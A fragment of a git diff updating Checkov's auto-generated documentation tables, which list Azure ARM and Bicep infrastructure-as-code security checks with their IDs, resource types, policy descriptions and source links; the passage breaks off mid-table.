[AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 30 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | +| 31 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | arm | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | +| 32 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | +| 33 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | +| 34 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | +| 35 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | +| 36 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 37 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 38 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 39 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 40 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 41 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 42 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | +| 43 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 44 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 45 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 46 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | +| 47 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | +| 48 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | +| 49 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | +| 50 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | +| 51 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | +| 52 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | +| 53 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | +| 54 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | +| 55 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | +| 56 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | +| 57 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | +| 58 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | arm | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) | +| 59 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | arm | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) | +| 60 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | arm | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) | +| 61 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | arm | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) | +| 62 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | arm | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) | +| 63 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 64 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | +| 65 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | arm | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) | +| 66 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | +| 67 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | arm | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) | +| 68 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | +| 69 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | +| 70 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 71 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 72 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | arm | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) | +| 73 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | arm | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) | +| 74 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | arm | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) | +| 75 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | arm | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) | +| 76 | CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | arm | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 77 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | +| 78 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | arm | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) | +| 79 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | arm | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) | +| 80 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | arm | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) | +| 81 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | +| 82 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | +| 83 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | +| 84 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | +| 85 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 86 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | +| 87 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 88 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 89 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | +| 90 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | +| 91 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | +| 92 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | +| 93 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | +| 94 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | +| 95 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | +| 96 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | +| 97 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | +| 98 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | +| 99 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | +| 100 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | +| 101 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) | +| 102 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | +| 103 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | +| 104 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 105 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 106 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 107 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 108 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | +| 109 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | arm | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) | +| 110 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 111 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 112 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | +| 113 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | arm | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) | +| 114 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts enable local authentication | arm | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) | +| 115 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services account is not configured with managed identity | arm | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) | +| 116 | CKV_AZURE_239 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is not configured with private endpoint | arm | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) | +| 117 | CKV2_AZURE_23 | resource | Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | +| 118 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| 119 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | arm | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) | +| 120 | CKV2_AZURE_49 | resource | Microsoft.MachineLearningServices/workspaces | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | arm | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml) | --- diff --git a/docs/5.Policy Index/bicep.md b/docs/5.Policy Index/bicep.md index 0027b28b597..aed93924bf2 100644 --- a/docs/5.Policy Index/bicep.md +++ b/docs/5.Policy Index/bicep.md @@ -6,105 +6,130 @@ nav_order: 1 # bicep resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | -| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | -| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) | -| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | 